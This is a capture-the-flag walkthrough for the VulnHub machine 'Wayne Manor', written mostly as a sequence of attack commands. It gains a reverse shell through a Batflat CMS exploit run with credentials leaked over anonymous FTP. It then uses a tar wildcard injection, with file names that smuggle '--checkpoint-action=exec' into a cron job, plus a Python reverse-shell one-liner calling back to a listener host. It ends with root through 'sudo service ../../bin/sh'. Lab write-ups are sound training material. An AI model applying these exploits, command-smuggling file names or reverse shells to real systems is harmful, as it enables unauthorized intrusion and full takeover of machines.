http://www.vulnhub.com/entry/wayne-manor-1,681/
Read GUIDELINES.txt in the unzipped files.
GUIDELINES: Add '<ip> waynemanor.com' to the '/etc/hosts' file. DHCP is ON. Enjoy! You can follow me on Twitter (@sec_balkan), in GitHub (@sec-balkan), or send me a message on Telegram (@sec_balkan).
Add <ip> waynemanor.com to /etc/hosts. (Important!)
Scan ports.
nmap -sV -sC -p- 192.168.33.137 -oN ports.log
Start with port 80; there is no need to wait for the full port scan to finish.
Check /blog for hints: they tell us to port-knock on 300, 350 and 400, after which FTP opens up.
Knock the ports, then scan again.
knock 192.168.33.137 300 350 400
Log in to FTP as anonymous, get info.txt and check it: it contains the CMS credentials.
The CMS is Batflat; search for an exploit.
Listen on one terminal and run the PoC in another to get a reverse shell.
nc -nlvp 1234
python3 49573.py http://waynemanor.com/ bruce alfred_help_me 192.168.33.128 1234
In /home/batman/.web/ we find script.sh.
Checking with pspy64 shows that a cron job runs script.sh every minute.
This is the tar wildcard exploit (tar run on a shell-expanded wildcard treats file names starting with -- as options). To escalate to user "batman", we need to create three files in /var/www/html.
echo '' > --checkpoint=1
echo '' > '--checkpoint-action=exec=sh pwn.sh'
cat <<EOF > pwn.sh
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.33.128",2234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
EOF
Then we listen on port 2234 and get a reverse shell as user "batman".
Check sudo -l: /usr/sbin/service can be run with sudo.
Use /usr/sbin/service to get root.
sudo service ../../bin/sh